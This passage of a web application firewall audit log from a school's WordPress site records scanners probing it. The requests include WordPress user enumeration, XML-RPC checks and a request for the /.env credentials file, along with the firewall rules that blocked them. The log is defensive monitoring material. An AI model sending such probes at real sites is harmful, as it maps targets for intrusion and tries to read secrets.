2) Stopwatch: 1747436196636885 2822 (- - -) Stopwatch2: 1747436196636885 2822; combined=1235, p1=435, p2=768, p3=0, p4=0, p5=31, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a09f625d-Z-- --935e1549-A-- [17/May/2025:05:56:41 +0700] aCfCqem4kjNN-hEbWjJAEgAAAEo 103.236.140.4 41718 103.236.140.4 8181 --935e1549-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --935e1549-C-- demo.sayHello --935e1549-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --935e1549-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436201626068 4962 (- - -) Stopwatch2: 1747436201626068 4962; combined=3868, p1=478, p2=3168, p3=28, p4=25, p5=98, sr=91, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --935e1549-Z-- --8b09727e-A-- [17/May/2025:05:57:32 +0700] aCfC3BKi5m5upc8uMd6hjwAAAMg 103.236.140.4 41730 103.236.140.4 8181 --8b09727e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.7 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b09727e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b09727e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436252859857 2461 (- - -) Stopwatch2: 1747436252859857 2461; combined=1095, p1=377, p2=693, p3=0, p4=0, p5=24, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b09727e-Z-- --3dcce634-A-- [17/May/2025:05:57:37 +0700] aCfC4em4kjNN-hEbWjJAFgAAAFM 103.236.140.4 41734 103.236.140.4 8181 --3dcce634-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.7 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.7 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3dcce634-C-- demo.sayHello --3dcce634-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3dcce634-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436257884057 6793 (- - -) Stopwatch2: 1747436257884057 6793; combined=4785, p1=690, p2=3868, p3=44, p4=45, p5=82, sr=144, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3dcce634-Z-- --ecb8a44d-A-- [17/May/2025:05:57:44 +0700] aCfC6Om4kjNN-hEbWjJAGAAAAFY 103.236.140.4 41738 103.236.140.4 8181 --ecb8a44d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ecb8a44d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ecb8a44d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436264276537 3546 (- - -) Stopwatch2: 1747436264276537 3546; combined=1471, p1=501, p2=938, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ecb8a44d-Z-- --aeb45625-A-- [17/May/2025:05:57:51 +0700] aCfC7-m4kjNN-hEbWjJAGQAAAFc 103.236.140.4 41742 103.236.140.4 8181 --aeb45625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeb45625-C-- demo.sayHello --aeb45625-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeb45625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436271100674 5805 (- - -) Stopwatch2: 1747436271100674 5805; combined=4179, p1=550, p2=3398, p3=32, p4=32, p5=98, sr=74, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeb45625-Z-- --3057f92d-A-- [17/May/2025:05:59:27 +0700] aCfDT-m4kjNN-hEbWjJAHAAAAEE 103.236.140.4 41754 103.236.140.4 8181 --3057f92d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3057f92d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3057f92d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436367153003 3609 (- - -) Stopwatch2: 1747436367153003 3609; combined=1617, p1=510, p2=996, p3=0, p4=0, p5=111, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3057f92d-Z-- --a3096717-A-- [17/May/2025:05:59:32 +0700] aCfDVOm4kjNN-hEbWjJAHgAAAEY 103.236.140.4 41758 103.236.140.4 8181 --a3096717-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3096717-C-- demo.sayHello --a3096717-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3096717-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436372188886 19218 (- - -) Stopwatch2: 1747436372188886 19218; combined=29636, p1=699, p2=3927, p3=37, p4=40, p5=12497, sr=177, sw=73, l=0, gc=12363 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3096717-Z-- --da061b20-A-- [17/May/2025:06:01:08 +0700] aCfDtOm4kjNN-hEbWjJAIgAAAE0 103.236.140.4 41772 103.236.140.4 8181 --da061b20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.132 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da061b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da061b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436468560638 3489 (- - -) Stopwatch2: 1747436468560638 3489; combined=1506, p1=529, p2=939, p3=0, p4=0, p5=37, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da061b20-Z-- --44008e27-A-- [17/May/2025:06:01:12 +0700] aCfDuOm4kjNN-hEbWjJAJQAAAFA 103.236.140.4 41780 103.236.140.4 8181 --44008e27-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --44008e27-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44008e27-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747436472792139 2188 (- - -) Stopwatch2: 1747436472792139 2188; combined=971, p1=347, p2=587, p3=0, p4=0, p5=36, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44008e27-Z-- --a7b09270-A-- [17/May/2025:06:01:12 +0700] aCfDuBKi5m5upc8uMd6hlAAAANA 103.236.140.4 41778 103.236.140.4 8181 --a7b09270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.99.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.99.132 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a7b09270-C-- demo.sayHello --a7b09270-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7b09270-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436472788805 6108 (- - -) Stopwatch2: 1747436472788805 6108; combined=4300, p1=570, p2=3505, p3=35, p4=40, p5=86, sr=71, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7b09270-Z-- --fc085e79-A-- [17/May/2025:06:01:21 +0700] aCfDwRKi5m5upc8uMd6hlgAAANM 103.236.140.4 41792 103.236.140.4 8181 --fc085e79-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc085e79-C-- demo.sayHello --fc085e79-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc085e79-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747436481448889 6702 (- - -) Stopwatch2: 1747436481448889 6702; combined=4726, p1=621, p2=3923, p3=31, p4=34, p5=70, sr=101, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc085e79-Z-- --7a522511-A-- [17/May/2025:06:10:52 +0700] aCfF_Om4kjNN-hEbWjJAagAAAEQ 103.236.140.4 41970 103.236.140.4 8181 --7a522511-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a522511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a522511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747437052471991 3666 (- - -) Stopwatch2: 1747437052471991 3666; combined=1558, p1=539, p2=987, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a522511-Z-- --7235fb55-A-- [17/May/2025:06:10:56 +0700] aCfGAOm4kjNN-hEbWjJAbgAAAEs 103.236.140.4 41980 103.236.140.4 8181 --7235fb55-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7235fb55-C-- demo.sayHello --7235fb55-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7235fb55-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437056498158 5235 (- - -) Stopwatch2: 1747437056498158 5235; combined=4082, p1=498, p2=3365, p3=27, p4=31, p5=94, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7235fb55-Z-- --a4da3a61-A-- [17/May/2025:06:21:43 +0700] aCfIh-m4kjNN-hEbWjJAdgAAAEM 103.236.140.4 42078 103.236.140.4 8181 --a4da3a61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a4da3a61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4da3a61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747437703809216 3115 (- - -) Stopwatch2: 1747437703809216 3115; combined=1330, p1=466, p2=829, p3=0, p4=0, p5=35, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4da3a61-Z-- --1fe7514b-A-- [17/May/2025:06:21:49 +0700] aCfIjem4kjNN-hEbWjJAeAAAAEU 103.236.140.4 42082 103.236.140.4 8181 --1fe7514b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fe7514b-C-- demo.sayHello --1fe7514b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe7514b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747437709513398 7003 (- - -) Stopwatch2: 1747437709513398 7003; combined=4917, p1=607, p2=4059, p3=38, p4=41, p5=102, sr=91, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe7514b-Z-- --4d3bb306-A-- [17/May/2025:06:22:23 +0700] aCfIr3yxdQCiyU1ENFcmUQAAABQ 103.236.140.4 42086 103.236.140.4 8181 --4d3bb306-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) Accept-Charset: utf-8 --4d3bb306-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d3bb306-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747437743509821 861 (- - -) Stopwatch2: 1747437743509821 861; combined=339, p1=294, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --e3808525-A-- [17/May/2025:06:23:23 +0700] aCfI63yxdQCiyU1ENFcmUwAAABY 103.236.140.4 42092 103.236.140.4 8181 --e3808525-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3808525-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3808525-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: 